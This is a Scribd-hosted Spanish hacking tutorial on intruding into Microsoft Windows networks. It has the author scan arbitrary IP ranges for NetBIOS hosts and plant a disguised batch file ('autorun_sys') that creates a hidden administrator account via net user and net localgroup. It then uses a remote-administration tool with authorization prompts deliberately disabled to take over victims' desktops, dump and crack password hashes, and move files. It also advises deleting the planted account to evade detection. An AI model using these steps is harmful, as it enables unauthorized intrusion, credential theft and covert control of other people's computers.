Scribd Logo
Upload

Welcome to Scribd!

  • Administracion e Intrusion en Redes Microsoft

    Uploaded by

    api-3775614
    147 views6 pages

    Original Title

    ADMINISTRACION_E_INTRUSION_EN_REDES_MICROSOFT

    Copyright

    © Attribution Non-Commercial (BY-NC)

    Available Formats

    PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document

    Copyright:

    Attribution Non-Commercial (BY-NC)
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    147 views6 pages

    Administracion e Intrusion en Redes Microsoft

    Uploaded by

    api-3775614

    Copyright:

    Attribution Non-Commercial (BY-NC)
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    of 6

    Hola soy Ednux y aquí os traigo mi segundo articulo de hacking.

    ADMINISTRACION E INTRUSION EN REDES MICROSOFT.

    Nos descagamos el IP tools de: http://hostmonitor.biz/download/ip-tools.exe y lo instalamos en


    nuestro PC

    Nos vamos a :

    http://www.consultorioinformatico.net/foro/index.php/topic,3646.0.html

    y cojemos el rango de IPs que nos de la gana.

    Abrimos el IPtools y en "NB Scaner" metemos el rango y dejamos que escanee asta que nos salga
    algo como esto:

    Despues de que nos salga eso....


    Creamos un bat con el siguiente codigo:

    @echo off
    net user usuarioquequierescrear /add
    net localgroup "administradores" usuarioqueacabasdecrear /add
    exit

    Con esto creamos un usuario que luego se agrega al grupo local administradores.
    Si el sistema victima es en inglés en vez de "administradores", seria "administrators".

    Nos conectamos via netbios a : IP y le subimos el bat. al que hemos llamado: autorun_sys ya que
    así picará más.
    Desgraciadamente este sistema no tenia el \c$ activado así que he tenido que hacer esta
    minichpuzilla. :P

    Lo que queremos conseguir es "CREARNOS UN USUARIO EN LA MAQUINA Y AGREGARLO AL


    GRUPO DE ADMINISTADORES".

    Ya sea por netbios,etc


    Si se tratase de un sevidor web podriamos haberle subido un shell.asp y desde la linea de
    comandos de la shell habernos creado el usuario.

    www.crackenfind.net article
    Una vez subido el bat y esperando...vamos a probar si la victima a picado y vamos a la parte
    "buena". ;)

    Para ello usaremos la que para mi es la mejor herramienta de monitoreo de redes:

    La herramienta: ATELIER WEB REMOTE COMMANDER.

    Requisitos:

    Un nombre usuario válido. ( para ello le subiremos el bat que creamos antes y lo pondremos en la

    www.crackenfind.net article
    carpeta inicio y en system32 . Otra opcion es subirle una shell o usar psexec para crearnos el
    usuario ).

    Con atelier conseguiremos esto:

    Escritorio (Desktop)

    Información del sistema (Sysinfo)

    Información de la topología de la red (NetworkInfo)

    Transferencia de ficheros (FileSystem)

    Información de usuarios y grupos (Users and Group) Además esta función permitirá averiguar los
    hashes de los users remotos y pasarlos al LC3 o LC4 para crackearlos.

    Chat, podremos hablar con el objetivo (mensajitos, etc) y él con nosotros si lo deseamos.( nio os lo
    recomiendo ya por logica ) Para los que penséis que esto es una lamerada, ya sabéis mi opinión,
    para mi esto es una herramienta de administración, que puede y es muy útil, dependerá del uso
    que se le dé, para que pase a estar en un bando o en otro.Funciona correctamente en entornos
    windows 2000, 2003 y XP, la filosofía, limitaciones, etc. se irán exponiendo a medida que lo vayáis
    usando y probando, el que no lo haga se va a perder algo bueno.

    Lo único que hay que hacer es instalar el programita en nuestro equipo, para ello lo podéis bajar de
    este sitio:

    http://ftp.saix.net/pub/simtelnet/winnt/network/awrc31.zip

    Funcionamiento:

    Una vez descargado e instalado el AWRC en nuestro equipo, ejecutad el Atelier Web
    RemoteCommander desde el menú de inicio o desde el icono de acceso directo que os
    creará.Veréis algo así:

    ES MUY IMPORTANTE NO VERIFICAR LA CASILLA Request Authorization, si lo hacéis cuando

    www.crackenfind.net article
    os conectéis al equipo remoto, le saldrá una ventanita diciendo que la ip tal.y.tal usuario fulano
    desea establecer la conexión... y eso no es bueno si queremos pasar desapercibidos

    Una vez comprobado que esa casilla no está verificada, escribiimos la ip remota, el usuario y la
    contraseña, luego Connect

    y....

    Bingo!!! la victima a picado y acabamos de obtener el escritorio remoto del equipo!!!!!

    Hay más.... Pulsamos en SysInfo

    Sin comentarios.... Más todavía, que falta lo mejor: Pulsamos en Users And Groups,

    www.crackenfind.net article
    acabamos de obtener los usuarios, grupos y HASHES !!!! Podemos incluso guardarlos para
    pasarles el Lc3 o lo que sea

    Vaaale, el resto os lo dejo a vosotros, podéis cambiar las opciones en Options y también en
    FileSystem podéis bajar-subir-borrar-crear etc, bastará con que seleccionéis la unidad de disco
    pulsad en GET y luego sobre el contenido del directorio el botón derecho del ratón...

    más o menos algo así:

    Por supuesto, se pueden ejecutar programas, snifear la red...etc servicios, detenerlos, bufff. miedo
    me está dando.

    Nota. Una vez ingresado al sistema sería conveniente cojer el hash del administrador del equipo y
    cackearlo y eliminar nuestro usuario, ya que eso pondria en alerta al administrador y nos fastidiaria
    el hackeo.

    www.crackenfind.net article
    Hasta aquí todo y espero poder acbar el tecer articulo muchisimo mejor que este.

    Escrito y creado por: Ednux


    email: ednux.sec@gmail.com

    www.crackenfind.net article

    You might also like